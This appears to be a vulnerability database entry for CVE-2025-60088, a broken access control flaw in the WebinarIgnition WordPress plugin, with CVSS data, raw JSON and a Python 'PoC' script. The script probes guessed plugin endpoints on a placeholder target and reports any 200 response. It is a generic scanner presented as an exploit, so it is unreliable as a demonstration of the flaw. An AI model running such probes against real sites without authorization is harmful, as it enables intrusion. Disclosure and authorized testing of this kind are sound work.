Security Vulnerability Report
中文
CVE-2025-60088 CVSS 6.5 MEDIUM

CVE-2025-60088

Published: 2025-12-18 08:16:09
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in Saleswonder Team: Tobias WebinarIgnition webinar-ignition allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WebinarIgnition: from n/a through <= 4.06.04.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WebinarIgnition <= 4.06.04

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-60088 PoC - WebinarIgnition Broken Access Control # Target: WordPress site with WebinarIgnition plugin <= 4.06.04 target = "http://target-wordpress-site.com" # Common WebinarIgnition endpoints that may be vulnerable endpoints = [ "/wp-admin/admin-ajax.php", "/wp-json/webinar-ignition/v1/", "/?rest_route=/webinar-ignition/v1/leads", "/wp-content/plugins/webinar-ignition/ajax.php" ] headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Content-Type": "application/json" } print("[*] Testing CVE-2025-60088 - WebinarIgnition Access Control") print(f"[*] Target: {target}") for endpoint in endpoints: url = f"{target}{endpoint}" try: response = requests.get(url, headers=headers, timeout=10) print(f"\n[?] Endpoint: {endpoint}") print(f" Status: {response.status_code}") if response.status_code == 200: print(f" [!] Potential unauthorized access detected!") print(f" Response preview: {response.text[:200]}") except requests.exceptions.RequestException as e: print(f"[-] Error testing {endpoint}: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60088", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:08.963", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Saleswonder Team: Tobias WebinarIgnition webinar-ignition allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WebinarIgnition: from n/a through <= 4.06.04."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/webinar-ignition/vulnerability/wordpress-webinarignition-plugin-4-05-13-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}